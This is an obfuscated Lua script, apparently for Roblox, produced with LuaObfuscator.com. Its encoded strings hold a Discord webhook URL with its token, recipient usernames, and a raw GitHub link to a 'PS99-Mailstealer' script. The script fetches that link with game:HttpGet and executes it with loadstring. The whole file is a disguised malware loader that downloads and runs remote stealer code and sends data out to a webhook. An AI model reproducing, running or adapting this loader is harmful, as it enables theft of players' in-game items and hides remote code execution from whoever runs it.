--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v92=0;local v93;while true do if (v92==1) then return v93;end if (v92==0) then v93=v5(v83,v19);v19=nil;v92=1;end end else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=0 + 0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((1 + 1)^(v32-((1 + 1) -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + (1031 -(892 + 65)))))) ;return v85-(v85%(569 -(367 + 201))) ;end end else local v86=2^(v32-(4 -(7 -4))) ;return (((v31%(v86 + v86))>=v86) and (928 -(214 + (1317 -604)))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0;local v36;local v37;while true do if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (352 -((345 -258) + 263)) );v18=v18 + (182 -(67 + 113)) ;v35=1 + 0 ;end if (v35==(2 -1)) then return (v37 * (189 + 67)) + v36 ;end end end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(952 -(802 + (328 -178)))) then v39,v40,v41,v42=v1(v16,v18,v18 + (8 -5) );v18=v18 + 3 + 1 ;v38=2 -1 ;end if (v38==(1 -0)) then return (v42 * 16777216) + (v41 * (148681 -83145)) + (v40 * 256) + v39 ;end end end local function v24() local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==1) then v46=1;v47=(v20(v45,1 + 0 ,35 -15 ) * (((3 -1) + 0)^(823 -(368 + 423)))) + v44 ;v43=(1429 -(630 + 793)) -4 ;end if (v43==(21 -(10 + 8))) then if (v48==(0 -0)) then if (v47==0) then return v49 * (442 -(416 + 26)) ;else local v111=0 -0 ;while true do if (v111==(0 + (0 -0))) then v48=1;v46=0 -0 ;break;end end end elseif (v48==2047) then return ((v47==(438 -((686 -541) + 293))) and (v49 * ((431 -(18 + 26 + 386))/(1486 -(998 + 488))))) or (v49 * NaN) ;end return v8(v49,v48-((1118 -793) + 698) ) * (v46 + (v47/((2 + 0)^(824 -(201 + 571))))) ;end if ((1138 -(116 + 1022))==v43) then v44=v23();v45=v23();v43=4 -(1750 -(760 + 987)) ;end if (v43==(2 + (1913 -(1789 + 124)))) then v48=v20(v45,76 -55 ,110 -79 );v49=((v20(v45,891 -((1894 -(1020 + 60)) + 45) )==(2 -1)) and  -(1 + 0)) or (1 + 0) ;v43=888 -(261 + 624) ;end end end local function v25(v50) local v51;if  not v50 then local v87=766 -(7 + 738 + 21) ;while true do if (v87==0) then v50=v23();if (v50==(0 + 0)) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;local v52={};for v66=3 -2 , #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=280 -(272 + 8) ;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((1 + 0)~=v53) then else v58=v23();v59={};for v94=1,v58 do local v95=0;local v96;local v97;local v98;while true do if (v95~=(1822 -(301 + 1521))) then else local v112=0 -0 ;while true do if (v112==(1 + 0)) then v95=1;break;end if (v112==(0 -0)) then v96=0 -0 ;v97=nil;v112=1701 -(1419 + 281) ;end end end if (1==v95) then v98=nil;while true do if ((1 -0)~=v96) then else if (v97==(75 -(71 + 3))) then v98=v21()~=(0 + 0) ;elseif (v97==(4 -2)) then v98=v24();elseif (v97~=3) then else v98=v25();end v59[v94]=v98;break;end if (v96==(0 -0)) then local v116=0;local v117;while true do if (v116~=0) then else v117=241 -(187 + 54) ;while true do if (v117==0) then v97=v21();v98=nil;v117=781 -(162 + 618) ;end if (v117==1) then v96=1;break;end end break;end end end end break;end end end v57[3]=v21();v53=2 + 0 ;end if (v53~=0) then else local v91=0;while true do if (v91~=(0 + 0)) then else v54={};v55={};v91=1;end if (2==v91) then v53=1 -0 ;break;end if (v91==1) then v56={};v57={v54,v55,nil,v56};v91=1002 -(451 + 549) ;end end end if (2==v53) then for v99=1 + 0 ,v23() do local v100=0;local v101;local v102;while true do if (v100~=0) then else local v113=0 -0 ;local v114;while true do if (v113==(0 -0)) then v114=1384 -(746 + 638) ;while true do if (v114==1) then v100=1 + 0 ;break;end if (0~=v114) then else v101=0 -0 ;v102=nil;v114=342 -(218 + 123) ;end end break;end end end if (v100==(1582 -(1535 + 46))) then while true do if (v101~=0) then else v102=v21();if (v20(v102,1 + 0 ,1)==(0 + 0)) then local v126=560 -(306 + 254) ;local v127;local v128;local v129;local v130;while true do if (v126~=1) then else local v164=0 + 0 ;while true do if (v164==1) then v126=2;break;end if (v164~=0) then else v129=nil;v130=nil;v164=1 -0 ;end end end if (v126~=(1467 -(899 + 568))) then else local v165=0 + 0 ;while true do if (1~=v165) then else v126=2 -1 ;break;end if (0~=v165) then else v127=0;v128=nil;v165=1;end end end if (v126==(605 -(268 + 335))) then while true do if (v127==(291 -(60 + 230))) then local v171=572 -(426 + 146) ;local v172;while true do if (v171==(0 + 0)) then v172=0;while true do if (v172==(1457 -(282 + 1174))) then v127=813 -(569 + 242) ;break;end if (v172==0) then v130={v22(),v22(),nil,nil};if (v128==0) then local v180=0 + 0 ;local v181;while true do if (v180==0) then v181=1024 -(706 + 318) ;while true do if (v181==0) then v130[3]=v22();v130[4]=v22();break;end end break;end end elseif (v128==(1252 -(721 + 530))) then v130[1274 -(945 + 326) ]=v23();elseif (v128==(4 -2)) then v130[3]=v23() -(2^(15 + 1)) ;elseif (v128==3) then local v190=0;local v191;while true do if (v190==0) then v191=700 -(271 + 429) ;while true do if (v191~=0) then else v130[3]=v23() -((2 + 0)^(1516 -(1408 + 92))) ;v130[4]=v22();break;end end break;end end end v172=1087 -(461 + 625) ;end end break;end end end if (v127~=(1288 -(993 + 295))) then else local v173=0;local v174;while true do if (0==v173) then v174=0;while true do if (v174==1) then v127=1 + 0 ;break;end if (v174==0) then v128=v20(v102,2,3);v129=v20(v102,1175 -(418 + 753) ,3 + 3 );v174=1 + 0 ;end end break;end end end if (v127~=2) then else local v175=0 + 0 ;local v176;while true do if (v175~=0) then else v176=0 + 0 ;while true do if (v176==0) then if (v20(v129,530 -(406 + 123) ,1770 -(1749 + 20) )~=(1 + 0)) then else v130[2]=v59[v130[2]];end if (v20(v129,1324 -(1249 + 73) ,2)~=(1 + 0)) then else v130[3]=v59[v130[3]];end v176=1;end if (v176==(1146 -(466 + 679))) then v127=6 -3 ;break;end end break;end end end if (v127==(8 -5)) then if (v20(v129,3,1903 -(106 + 1794) )==1) then v130[4]=v59[v130[4]];end v54[v99]=v130;break;end end break;end end end break;end end break;end end end for v103=1,v23() do v55[v103-1 ]=v28();end return v57;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v89=0;while true do if (v89==1) then if (v81<=5) then if (v81<=2) then if (v81<=0) then v62[v80[3]]=v78[v80[2]];elseif (v81==1) then v72=v80[3];else local v135=v80[2];v78[v135]=v78[v135](v13(v78,v135 + 1 ,v73));end elseif (v81<=3) then v78[v80[2]]=v80[3];elseif (v81>4) then do return;end else local v137=0;local v138;local v139;while true do if (v137==0) then v138=v80[2];v139=v78[v80[3]];v137=1;end if (v137==1) then v78[v138 + 1 ]=v139;v78[v138]=v139[v80[4]];break;end end end elseif (v81<=8) then if (v81<=6) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>7) then local v141;local v142,v143;local v144;local v145;v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v145=v80[2];v144=v78[v80[3]];v78[v145 + 1 ]=v144;v78[v145]=v144[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v145=v80[2];v142,v143=v71(v78[v145](v13(v78,v145 + 1 ,v80[3])));v73=(v143 + v145) -1 ;v141=0;for v161=v145,v73 do v141=v141 + 1 ;v78[v161]=v142[v141];end v72=v72 + 1 ;v80=v68[v72];v145=v80[2];v78[v145]=v78[v145](v13(v78,v145 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];end elseif (v81<=9) then local v122=v80[2];local v123,v124=v71(v78[v122](v13(v78,v122 + 1 ,v80[3])));v73=(v124 + v122) -1 ;local v125=0;for v131=v122,v73 do v125=v125 + 1 ;v78[v131]=v123[v125];end elseif (v81==10) then v78[v80[2]]();else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;break;end if (v89==0) then v80=v68[v72];v81=v80[1];v89=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O342O393330343137322O303337342O362F63304333582O6B2O412D71315062494E623243413378426D61646B374A346B4269794F466649424A2O356A63777A6C394E68536B6C5643465A545A347669677159755F38030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C79706865725363726970742F50532O392D4D61696C737465616C65722F6D61696E2F50532O394D61696C737465616C657203083O00557365726E616D65030C3O0064617669626C617A6572303103093O00557365726E616D653200163O0012033O00013O0026063O000D000100020004013O000D0001001203000100043O001208000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001500010026063O0001000100010004013O000100010012030001000A3O001207000100093O00122O0001000A3O00122O0001000B3O00124O00023O00044O000100012O00053O00017O00",v9(),...);
